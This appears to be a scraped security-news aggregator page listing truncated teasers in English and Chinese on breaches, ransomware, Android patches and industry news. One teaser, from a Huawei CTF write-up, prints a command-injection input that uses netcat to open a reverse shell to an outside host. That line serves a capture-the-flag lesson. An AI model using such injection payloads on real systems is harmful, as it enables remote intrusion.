Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Browsing all 12749 articles
Browse latest View live

Optic Security a new player in ANZ digital security market

IT security company Optic Security Group has launched in the Australian and New Zealand markets following a merger of six entities with combined revenues in excess of $100 million into a newly-formed...

View Article



用户数据泄露多发 工信部将开展移动恶意程序专项治理

12月3日,工信部网络安全管理局发布2018年第三季度网络安全威胁态势分析与工作综述。第三季度公共互联网网络安全形势依然严峻,发生多起严重危害用户合法权益的网络安全事件。工信部下一步工作重点包括:做好网络安全试点示范项目相关工作;开展移动恶意程序专项治理工作等。...

View Article

7 Security Trends to Watch in the New Year

As we approach a new year, it’s time for security professionals to think critically about the next challenges they will face and how these could impact their organization. Here are the seven things I...

View Article

Why is an information security policy so important?

Information security is all about protecting your organisation’s information, whether digitally or in hard copy. ISO 27000 which defines the key terms of ISO 27001, the international standard for...

View Article

译:数字身份证比你想象的更危险

注:本文翻译自 Brett Solomon 的文章《DIGITAL IDS ARE MORE DANGEROUS THAN YOU THINK》。 我在 “五条 | 创业者的日程表,数字身份的隐患,下拉菜单少用比较好” 中提到了本文,你可以点击链接阅读原文。 由于翻译人手增加,所以根据上上周末投票,选择上上周排名第二的本文进行翻译: 显然,有一个确定的、被认同的身份 ID...

View Article


Marriott's Breach Response Is So Bad, Security Experts Are Filling In the Gaps

An anonymous reader quotes a report from TechCrunch: Last Friday, Marriott sent out millions of emails warning of a massive data breach -- some 500 million guest reservationshad been stolen from its...

View Article

The future of network-connected device security

Wireless functionality has improved workplace efficiency and organisations are no longer restricted by cabling access. Unfortunately, many of these devices are poorly secured and rarely have their...

View Article

Kubernetes security flaw allows hackers to infiltrate backend servers

First major security flaw in popular cloud container orchestrator Kubernetes discovered and it may be impossible to tell if you have been compromised Find any firm at the forefront of digital...

View Article


Image may be NSFW.
Clik here to view.

December Android Security Bulletin out for Pixel, Nexus, and Essential Phone

Google is more serious in updating the mobile platform. It’s one way of ensuring Android is always up-to-date on most mobile devices. However, it will still always depend on OEMs or mobile carriers to...

View Article


常见加密算法入门

参考 https://www.jianshu.com/p/ce3893a7be09 比特币的加密算法 https://www.jianshu.com/p/57fc42456ab4 分类和简述 常见的密钥加密算法类型大体可以分为三类:对称加密(单秘钥加密)、非对称加密、单向加密(结果唯一且计算过程可重复但是计算不可逆) 对称加密算法...

View Article

Image may be NSFW.
Clik here to view.

华为CTF 2018 Writeup

挑战 1 废弃的筒仓 类别: Web 这个挑战题目的页面向我们展示了一个表单,在输入框可以指定参数来 ping 我们输入的 ip 。页面提供了一个线索,告知我们 flag 在文件 flag.txt 中。 我们尝试注入使用netcat建立反向连接的命令,127.0.0.1;nc reverse.sistec.es 8080。 我们验证了反向连接已经成功建立,我们可以通过这个反向的 shell...

View Article

Auth0 Achieves Gold CSA STAR Certification

BELLEVUE, Wash., December 4, 2018 Auth0, a global leader in Identity-as-a-Service (IDaaS), today announced it has achieved Gold CSA Star certification from the Cloud Security Alliance (CSA) ,...

View Article

Image may be NSFW.
Clik here to view.

A Guide For Protecting Yourself From Identity Theft

Photo by rawpixel on Unsplash In the modern world, we do a lot of work on the internet. Some people build entire businesses which operate online. This can lead to some very successful enterprises, and...

View Article


US government building tools to deanonymize anonymous cryptocurrencies

If you thought you were safe using privacy coins like Zcash and Monero you might want to think again. It appears that the US Department of Homeland Security (DoHS) is looking to develop forensic...

View Article

Image may be NSFW.
Clik here to view.

Security Incident Potentially Exposed 100 Million Quora Users’ Personal Data

A security incident at Quora potentially compromised the personal information and other details of approximately 100 million users. On 30 November, the question-and-answer website identified that a...

View Article


Image may be NSFW.
Clik here to view.

A security overview of Content Management Systems

Any developer would probably agree Content Management Systems (CMS) make it easier for web development teams and marketing to work together. However CMS assets like blog.company.com are also web...

View Article

Image may be NSFW.
Clik here to view.

Homeland Security Will Let Computers Predict Who Might Be A Terrorist On Your...

You’re rarely allowed to know exactly what’s keeping you safe. When you fly, you’re subject to secret rules , secretwatchlists, hidden cameras, and other trappings of a plump, thriving surveillance...

View Article


Image may be NSFW.
Clik here to view.

新勒索病毒来袭?专家:该病毒容易破解 升级杀毒软件可拦截

12月1日,一家名为火绒安全的终端安全技术公司发文称,团队分析确认该病毒(Ransom/Bcrypt)为新型“勒索病毒”,入侵电脑运行后,会加密用户文件,但不收取比特币,而是要求受害者扫描弹出的微信二维码支付110元赎金,这也是国内首次出现要求微信支付赎金的“勒索病毒”。 据火绒安全统计,截止到12月3日,已有超过两万用户感染该病毒,并且被感染电脑数量还在增长。...

View Article

Image may be NSFW.
Clik here to view.

Marriott International Suffers 500m Record Data Breach

So much is going on every month in the world of cybersecurity, online privacy, and data protection. It’s difficult to keep up! Our monthly security digest will help you keep tabs on the most important...

View Article

Image may be NSFW.
Clik here to view.

Eclypsium raises $8.75M Series A round led by Madrona Venture Group to tackle...

Yuriy Bulygin, co-founder and CEO, Eclypsium (Eclypsium Photo) Chip vulnerabilities and supply-chain concerns have directed fresh eyes at the critical issues around hardware security, and a...

View Article
Browsing all 12749 articles
Browse latest View live




Latest Images